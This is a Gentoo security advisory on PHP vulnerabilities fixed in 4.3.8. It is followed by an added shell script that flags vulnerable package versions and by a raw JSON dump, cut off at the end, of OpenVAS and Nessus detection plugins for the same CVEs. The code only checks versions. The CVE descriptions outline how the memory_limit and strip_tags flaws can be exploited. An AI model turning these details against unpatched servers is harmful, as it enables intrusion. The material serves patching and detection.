ID GLSA-200407-13 Type gentoo Reporter Gentoo Foundation Modified 2004-07-15T00:00:00
Description
Background
PHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version of PHP, or can run stand-alone in a CLI.
Description
Several security vulnerabilities were found and fixed in version 4.3.8 of PHP. The strip_tags() function, used to sanitize user input, could in certain cases allow tags containing \0 characters (CAN-2004-0595). When memory_limit is used, PHP might unsafely interrupt other functions (CAN-2004-0594). The ftok and itpc functions were missing safe_mode checks. It was possible to bypass open_basedir restrictions using MySQL's LOAD DATA LOCAL function. Furthermore, the IMAP extension was incorrectly allocating memory and alloca() calls were replaced with emalloc() for better stack protection.
Impact
If successfully exploited, the memory_limit problem could allow remote execution of arbitrary code. By exploiting the strip_tags vulnerability, it is possible to pass HTML code that would be considered as valid tags by the Microsoft Internet Explorer and Safari browsers. Using ftok, itpc or MySQL's LOAD DATA LOCAL, it is possible to bypass PHP configuration restrictions.
Workaround
There is no known workaround that would solve all these problems. All users are encouraged to upgrade to the latest available versions.
Resolution
All PHP, mod_php and php-cgi users should upgrade to the latest stable version:
    # emerge sync

    # emerge -pv ">=dev-php/php-4.3.8"
    # emerge ">=dev-php/php-4.3.8"

    # emerge -pv ">=dev-php/mod_php-4.3.8"
    # emerge ">=dev-php/mod_php-4.3.8"

    # emerge -pv ">=dev-php/php-cgi-4.3.8"
    # emerge ">=dev-php/php-cgi-4.3.8"

References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0594
http://security.e-matters.de/advisories/122004.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0595
http://security.e-matters.de/advisories/112004.html
https://bugs.gentoo.org/show_bug.cgi?id=56985
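To audit a host against this advisory, the following added example (not part of the GLSA or of any Gentoo tooling) classifies installed package atoms against the fixed version 4.3.8. It assumes one `category/name-version` entry per line on standard input, such as the output of `qlist -Iv`; the function names and the sample list are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag the PHP packages named in GLSA 200407-13 that are
# older than the fixed release. Function names are hypothetical.

FIXED_VERSION="4.3.8"   # first fixed version, from the advisory's Resolution
AFFECTED_ATOMS="dev-php/php dev-php/mod_php dev-php/php-cgi"

# version_lt A B: succeed when dotted numeric version A is strictly older than B.
version_lt() {
    vl_a=$1
    vl_b=$2
    while [ -n "$vl_a" ] || [ -n "$vl_b" ]; do
        vl_x=${vl_a%%.*}
        vl_y=${vl_b%%.*}
        # Drop the component just read; an exhausted side compares as 0.
        case $vl_a in *.*) vl_a=${vl_a#*.} ;; *) vl_a= ;; esac
        case $vl_b in *.*) vl_b=${vl_b#*.} ;; *) vl_b= ;; esac
        if [ "${vl_x:-0}" -lt "${vl_y:-0}" ]; then return 0; fi
        if [ "${vl_x:-0}" -gt "${vl_y:-0}" ]; then return 1; fi
    done
    return 1   # equal versions are not "older"
}

# classify_pkg CATEGORY/NAME-VERSION: print VULNERABLE, OK, UNKNOWN or SKIP.
classify_pkg() {
    # A Gentoo "-rN" revision never crosses the 4.3.8 boundary, so drop it.
    cp_norev=$(printf '%s\n' "$1" | sed 's/-r[0-9][0-9]*$//')
    cp_ver=${cp_norev##*-}
    cp_name=${cp_norev%-*}

    # Only the three packages listed in the advisory are in scope.
    case " $AFFECTED_ATOMS " in
        *" $cp_name "*) ;;
        *) echo "SKIP"; return 0 ;;
    esac

    # Suffixes such as _rc1 or _p2 need Portage's own ordering rules;
    # report them for manual review instead of guessing.
    case $cp_ver in
        ''|*[!0-9.]*) echo "UNKNOWN"; return 0 ;;
    esac

    if version_lt "$cp_ver" "$FIXED_VERSION"; then
        echo "VULNERABLE"
    else
        echo "OK"
    fi
}

# scan_installed: read atoms on stdin, print "STATUS ATOM" for in-scope packages.
scan_installed() {
    while IFS= read -r si_line; do
        [ -n "$si_line" ] || continue
        si_status=$(classify_pkg "$si_line")
        [ "$si_status" = "SKIP" ] || printf '%s %s\n' "$si_status" "$si_line"
    done
}

# Constructed sample of installed packages (not taken from a real host).
sample_installed() {
    cat <<'EOF'
dev-php/php-4.3.7-r1
dev-php/mod_php-4.3.8
dev-php/php-cgi-4.3.4
dev-lang/python-2.3.4
dev-php/php-4.3.8_rc1
EOF
}

sample_installed | scan_installed
```

Entries reported as UNKNOWN carry a version suffix this script does not order and should be checked by hand against the advisory.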
\"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\nphp = get_http_banner(port:port);\nif(!php)exit(0);\n\nif(ereg(pattern:\"PHP/4\\.3\\.[0-7][^0-9]\", string:php))\n security_message(port);\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-202-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053923", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053923", "title": "Slackware Advisory SSA:2004-202-01 PHP", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_202_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53923\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-202-01 PHP\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-202-01\");\n\n script_tag(name:\"insight\", value:\"New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and -current\nto fix security issues (memory_limit handling and a problem in the strip_tags\nfunction). 
Sites using PHP should upgrade.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-202-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:56:40", "bulletinFamily": "scanner", "description": "Check for the Version of Apache", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=835148", "id": "OPENVAS:835148", "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_id(835148);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_summary(\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:40:13", "bulletinFamily": "scanner", "description": "Check for the Version of Apache", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835148", "id": "OPENVAS:1361412562310835148", "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. 
The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835148\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
(__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-22T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52372", "id": "OPENVAS:52372", "title": "php -- memory_limit related vulnerability", "type": "openvas", "sourceData": "#\n#VID dd7aa4f1-102f-11d9-8a8a-000c41e2cdad\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n mod_php4-twig\n php4\n php4-cgi\n php4-cli\n php4-dtc\n php4-horde\n php4-nms\n mod_php4\n php5\n php5-cgi\n php5-cli\n mod_php5\n\nCVE-2004-0594\nThe memory_limit functionality in PHP 4.x up to 4.3.7, and 5.x up to\n5.0.0RC3, under certain conditions such as when register_globals is\nenabled, allows remote attackers to execute arbitrary code by\ntriggering a memory_limit abort during execution of the zend_hash_init\nfunction and overwriting a HashTable destructor pointer before\nthe initialization of key data structures is complete.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://security.e-matters.de/advisories/112004.html\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=108981780109154\nhttp://www.vuxml.org/freebsd/dd7aa4f1-102f-11d9-8a8a-000c41e2cdad.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52372);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 
(Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0594\");\n script_bugtraq_id(10725);\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"php -- memory_limit related vulnerability\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mod_php4-twig\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package mod_php4-twig version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n 
txt += 'Package php4-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3,1\")<=0) {\n txt += 'Package mod_php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2\")<=0) {\n txt += 'Package php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2\")<=0) {\n txt += 'Package php5-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2\")<=0) {\n txt += 'Package php5-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2,1\")<=0) {\n txt += 'Package mod_php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T08:52:24", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP 4.3.x installed on the\nremote host is prior to 4.3.7. 
It is, therefore, potentially\naffected by a bug that could allow an attacker to execute arbitrary\ncode on the remote host if the option memory_limit is set. Another\nbug in the function strip_tags() may allow an attacker to bypass\ncontent restrictions when submitting data and may lead to cross-site \nscripting issues.", "modified": "2019-12-02T00:00:00", "id": "PHP_STRIP_TAGS_MEMORY_LIMIT_VULN.NASL", "href": "https://www.tenable.com/plugins/nessus/13650", "published": "2004-07-15T00:00:00", "title": "PHP < 4.3.8 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13650);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2004-0594\",\"CVE-2004-0595\");\n script_bugtraq_id(10724, 10725);\n\n script_name(english:\"PHP < 4.3.8 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for version of PHP\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP 4.3.x installed on the\nremote host is prior to 4.3.7. It is, therefore, potentially\naffected by a bug that could allow an attacker to execute arbitrary\ncode on the remote host if the option memory_limit is set. 
Another\nbug in the function strip_tags() may allow an attacker to bypass\ncontent restrictions when submitting data and may lead to cross-site \nscripting issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/4_3_8.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP 4.3.8.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n \n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n 
port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^4\\.3\\.[0-7]($|[^0-9])\")\n{\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 4.3.8\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:55", "bulletinFamily": "scanner", "description": "This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). 
CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the ", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2004-222.NASL", "href": "https://www.tenable.com/plugins/nessus/13748", "published": "2004-07-24T00:00:00", "title": "Fedora Core 1 : php-4.3.8-1.1 (2004-222)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-222.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13748);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:32:23\");\n\n script_xref(name:\"FEDORA\", value:\"2004-222\");\n\n script_name(english:\"Fedora Core 1 : php-4.3.8-1.1 (2004-222)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n 